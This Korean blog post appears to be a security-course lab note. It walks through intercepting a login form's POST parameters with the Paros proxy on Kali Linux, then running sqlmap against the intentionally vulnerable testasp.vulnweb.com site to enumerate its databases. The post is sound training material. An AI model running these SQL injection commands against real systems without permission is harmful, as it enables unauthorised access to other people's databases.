On KaliLinux
KaliLinux는 기본적으로 paros가 설치되어 있다.
1. Proxy 설정
paros 웹 proxy 설정
# paros &
Tools > Options > Local proxy > OK
Address : localhost
Port : 8000
(주의) paros는 종료하지 않는다. paros는 proxy 서버이다.
웹브라우저에서 paros를 proxy 서버로 지정한다.
# firefox &
Preferences > Advanced > Network > Settings > OK > Close
[ V ] Manual proxy configuration
HTTP proxy : localhost Port : 8000
웹브라우저에서 해당 사이트의 로그인 페이지에 접속한다.
http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault.asp%3F
2. 파로스를 이용하여 POST 방식의 정보 확인
-> POST 방식으로 전달되는 패러미터는 육안으로 확인할 수 없기 때문에 paros로 확인
-> paros에서 [Trap] 탭
[ V ] Trap Request
웹 로그인 페이지에 임의의 계정(aaaa)과 암호(aaaa)를 입력하고 "Login"을 선택한다.
paros에서 확인
-> paros에서 전달되는 POST 방식의 패러미터 확인
-> tfUName=aaaa&tfUPass=aaaa 확인(점검 대상 패러미터는 tfUName 과 tfUPass 이다.)
3. 임의의 계정으로 sqlmap을 통해 DB 접근 확인
# sqlmap -u "http://testasp.vulnweb.com/Login.asp" \
--data="tfUName=user&tfUPass=pass123" --batch
# sqlmap -u "http://testasp.vulnweb.com/Login.asp" \
--data="tfUName=user&tfUPass=pass123" \
--dbs --batch
-> 임의의 사용자로 접근이 가능한 DB 정보들을 확인할 수 있다.
정리 :
(GET method)
# sqlmap -u testasp.vulnweb.com/showforum.asp?id=2 --dbs
(POST method)
# sqlmap -u "http://testasp.vulnweb.com/Login.asp" --data="tfUName=user&tfUPass=pass123" --dbs
정리 2 :
웹 스캐너(paros)를 통한 1차 테스트 > 전문툴(sqlmap)을 통한 2차 테스트
'정보보안공부 > 정보보안전문과정' 카테고리의 다른 글
| 정보보안 과정 Day120 : Python requests / beautifulsoup 모듈 (0) | 2021.03.04 |
|---|---|
| 정보보안 과정 Day 119 : CRLF(HTTP 응답분할) / XSS / 파일업로드 (0) | 2021.03.03 |
| 정보보안 과정 Day 118-1 : Paros + sqlmap (0) | 2021.02.26 |
| 정보보안 과정 Day 118 : MySQL DB 공격 실습 (0) | 2021.02.26 |
| 정보보안 과정 Day 117 : MySQL DB 쿼리 테스트 / 웹쉘 (0) | 2021.02.25 |